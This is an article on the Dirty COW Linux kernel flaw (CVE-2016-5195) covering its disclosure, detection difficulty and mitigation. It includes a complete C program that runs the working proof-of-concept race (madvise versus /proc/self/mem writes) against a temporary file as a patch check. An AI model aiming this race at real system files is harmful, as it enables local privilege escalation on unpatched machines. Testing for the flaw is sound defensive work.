The Dirty Cow Linux kernel security flaw (CVE-2016-5195), reported by a security researcher and disclosed by software vendor Red Hat, is being actively exploited in the wild. The disclosure has prompted Red Hat to issue a stern warning to Linux administrators to patch the flaw immediately; any system left unpatched remains open to the exploit.
Unfortunately, should the Dirty Cow Linux kernel security flaw be exploited, the attack may be hard to detect, because it is difficult to differentiate between legitimate use and an attack: the exploit only uses ordinary memory-management system calls that legitimate software also makes. Currently anti-virus software is unlikely to detect Dirty Cow. Even if signatures are developed, they are only likely to detect an attack after it has occurred; they would be unlikely to block one.
The flaw has been present in the kernel for around nine years. It was given the name ‘Dirty COW’ after its cause: a race condition in the way the Linux kernel’s memory subsystem handles the copy-on-write (COW) breakage of private, read-only memory mappings.
Some of the attacks that have been identified have been highly complex. That said, the flaw itself is simple to exploit. The Linux security researcher who discovered the vulnerability, Phil Oester, said exploiting the flaw is “trivial” and pointed out that the exploit seen in the wild “never fails”. Oester obtained a copy of the in-the-wild exploit and was able to test it in a sandbox.
As Oester explains, “An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”
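To make the copy-on-write point concrete, here is an added example; it is not code from the article, from Oester or from Red Hat. The first function shows the normal behaviour the flaw subverts: a write through a MAP_PRIVATE mapping of a read-only file is redirected to a private copy, so the file itself is never touched. The second function runs the race used by the public CVE-2016-5195 proof-of-concept (one thread repeatedly discarding the private page with madvise(MADV_DONTNEED) while another writes through /proc/self/mem), a mechanism the article does not describe, against a throwaway temporary file, and reports whether the write reached the file. This is the kind of sandbox test an administrator can use to confirm a kernel is patched. The function names, the sample file content and the iteration count are assumptions; the code is Linux-only and links against pthreads.

```c
/*
 * dirtycow_check.c: added example, not code from the article, Oester or Red Hat.
 * Part 1 shows normal copy-on-write isolation of a MAP_PRIVATE mapping of a
 * read-only file. Part 2 runs the race from the public CVE-2016-5195
 * proof-of-concept (madvise(MADV_DONTNEED) vs. a write through /proc/self/mem)
 * against a throwaway temp file to test whether the running kernel is vulnerable.
 * Linux only. Build: cc -O2 -pthread dirtycow_check.c -o dirtycow_check
 */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ORIGINAL "read-only sample content\n" /* constructed file content (assumption) */
#define PAYLOAD  "DIRTY"                      /* bytes the race tries to plant in the file */
#define ITER     100000                       /* race attempts (assumption); raise for a stronger check */
#define PAGE     4096

/* Write ORIGINAL to a fresh temp file, make it read-only, and return a read-only fd. */
static int make_readonly_file(char *path, size_t len) {
    const char *dir = getenv("TMPDIR");
    snprintf(path, len, "%s/dirtycow_XXXXXX", dir ? dir : "/tmp");
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    ssize_t n = write(fd, ORIGINAL, sizeof(ORIGINAL) - 1);
    close(fd);
    if (n != (ssize_t)(sizeof(ORIGINAL) - 1) || chmod(path, 0444) != 0) { unlink(path); return -1; }
    return open(path, O_RDONLY);
}

/* Read the file back through the page cache: 1 if it still holds ORIGINAL, 0 if modified, -1 on error. */
static int file_unchanged(int fd) {
    char buf[128] = {0};
    if (pread(fd, buf, sizeof buf - 1, 0) < 0) return -1;
    return memcmp(buf, ORIGINAL, sizeof(ORIGINAL) - 1) == 0;
}

static void cleanup(char *map, int fd, const char *path) {
    if (map && map != MAP_FAILED) munmap(map, PAGE);
    if (fd >= 0) close(fd);
    unlink(path);
}

/* Part 1. A write through a MAP_PRIVATE mapping of a read-only file must fault in a
 * private copy: the process sees PAYLOAD, the file does not. Returns 1 if so. */
int cow_isolates_private_write(void) {
    char path[256];
    int fd = make_readonly_file(path, sizeof path);
    if (fd < 0) return -1;
    char *map = mmap(NULL, PAGE, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) { cleanup(NULL, fd, path); return -1; }
    memcpy(map, PAYLOAD, sizeof(PAYLOAD) - 1);          /* triggers the COW fault */
    int saw_private = memcmp(map, PAYLOAD, sizeof(PAYLOAD) - 1) == 0;
    int untouched = file_unchanged(fd);
    cleanup(map, fd, path);
    return saw_private && untouched == 1;
}

struct race { char *map; volatile int stop; };

/* Thread A: keep discarding the private COW page so the mapping falls back to the page-cache page. */
static void *drop_private_page(void *arg) {
    struct race *r = arg;
    while (!r->stop) madvise(r->map, PAGE, MADV_DONTNEED);
    return NULL;
}

/* Thread B: write through /proc/self/mem, which forces a COW break on a read-only mapping;
 * on a vulnerable kernel the write can land on the file-backed page instead of the copy. */
static void *write_via_procmem(void *arg) {
    struct race *r = arg;
    int mem = open("/proc/self/mem", O_RDWR);
    if (mem >= 0) {
        for (int i = 0; i < ITER; i++) {
            lseek(mem, (off_t)(uintptr_t)r->map, SEEK_SET);
            write(mem, PAYLOAD, sizeof(PAYLOAD) - 1);
        }
        close(mem);
    }
    r->stop = 1;
    return NULL;
}

/* Part 2. Returns 1 if PAYLOAD reached the file (kernel vulnerable), 0 if the race was
 * not won within ITER attempts, -1 on setup error. */
int dirty_cow_probe(void) {
    char path[256];
    struct race r = { NULL, 0 };
    int fd = make_readonly_file(path, sizeof path);
    if (fd < 0) return -1;
    r.map = mmap(NULL, PAGE, PROT_READ, MAP_PRIVATE, fd, 0);   /* read-only, as a target binary would be */
    if (r.map == MAP_FAILED) { cleanup(NULL, fd, path); return -1; }
    pthread_t a, b;
    if (pthread_create(&a, NULL, drop_private_page, &r) != 0) { cleanup(r.map, fd, path); return -1; }
    if (pthread_create(&b, NULL, write_via_procmem, &r) != 0) {
        r.stop = 1; pthread_join(a, NULL); cleanup(r.map, fd, path); return -1;
    }
    pthread_join(b, NULL);
    pthread_join(a, NULL);
    int untouched = file_unchanged(fd);
    cleanup(r.map, fd, path);
    return untouched < 0 ? -1 : !untouched;
}

int main(void) {
    printf("copy-on-write isolation: %s\n", cow_isolates_private_write() == 1 ? "ok" : "FAILED");
    int v = dirty_cow_probe();
    printf("CVE-2016-5195 probe: %s\n", v == 1 ? "VULNERABLE" : v == 0 ? "race not won in this run" : "setup error");
    return v == 1;
}
```

Because the bug is a race, a result of 0 only means the race was not won within ITER attempts; on a patched kernel the write through /proc/self/mem is always redirected to the private copy, so the file stays intact no matter how many iterations are run. Run it only on a disposable test system, never against real files.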
Due to the ease with which the exploit can be used, Oester believes it is likely to be used much more extensively against unpatched systems in the future. Red Hat’s interim mitigation blocks the exploit currently circulating in the wild, but it does not fix the underlying flaw, so further exploits that bypass it could be developed; only an updated kernel closes the bug itself.